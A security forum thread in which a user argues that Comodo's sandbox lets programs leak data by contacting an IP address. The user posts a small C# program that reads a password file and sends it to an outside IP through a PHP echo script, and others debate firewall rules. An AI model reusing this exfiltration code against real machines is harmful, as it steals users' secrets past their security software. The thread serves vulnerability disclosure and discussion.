Did you read what I said ? I just have to use an ip and not a domain and I won’t have any alert from D+ because it won’t use DNS and defense+ won’t react to this.
But I don’t own a server with my own ip. Or must I create i special network at home to show you it ?
So, i change a little the application, and I made a server with wamp on an another computer connected on a special network to be sure it’s not on y local network.
My network is in 192.168.0.0/255.255.255.0 and the server on 220.127.116.11/255.255.255.0
I try to steal a password from an application that store it into a file named mypreciousdata.dat in c:\program files\Myapps
here the code of the application in c#
static class Program
/// Point d’entrée principal de l’application.
static void Main()
StreamReader monStreamReader = new StreamReader(“c:/Program Files/Myapps/mypreciousdata.dat”);
string data = monStreamReader.ReadLine();
string result = “”;
MessageBox.Show("your precious data is : " + data);
WebClient client = new WebClient();
result = client.DownloadString("http://18.104.22.168/echo.php?data=" + data);
MessageBox.Show("Answer from website : " + result);
Code of php server
My steal data : <?php echo $_GET['data'] ?>
Here we go, I execute my application, CIS sandbox it (see test1.jpg)
And then, data is sent … php server answered me … (see test2.jpg)
Let me ask you politely - Are you okay? 88) I mean, what kind of logic is this, huh? You talk and talk and talk about prevention, but now when we ask for PREVENTION for possible exploit(s) you give these lame excuses?
Why do you add Sandbox then? FOR PREVENTION! You have said many times that D+ is almost bullet proof and no malware in the wild can bypass it, but you still added Sandbox for PREVENTION!
What i am saying is: there is a risk v reward ratio, There is no 100% security, and no security vendor try to close every theoritical hole. Which means the focus has to be what really matters, which is real malware out there. No point in disturbing the user for a theoritical protection.
So why use this kind of rule ? It’s the only error here because the application won’t do anything to the system., that why D+ don’t see anything. It’s just about take an information and that all.
You made the rule because you think that it will be better for novice users, but what use novice users ? All applications that lot of people use and so, without any alert because they are already in your safe list.
So really, why put this rule whereas it can be a security hole in certain conditions ?
I think a way around this rule would be to use the white list for the firewall also, if the application is signed and part of the white list it gets access, if not you get asked. I don’t think it would be to hard to implement and that way you will have security and ease of use.
You’re talking about firewall’s Safe Mode which is present in CIS since its beginning.
I personally have a problem with the way the new firewall policy is implemented rather than there exists such thing like allow all outgoing connections mode in CIS. By adding these weird policy to Application Rules in Network Security Policy, Comodo practically rendered Firewall Security Level setting completely useless. IMHO, here is how it should be done…
these possibilities exist IF you can infect the PC in the first place.
So what is being talked about here is NOT even how to infect the PC…
it is IF they managed to infect the pc, this is how they can extract information.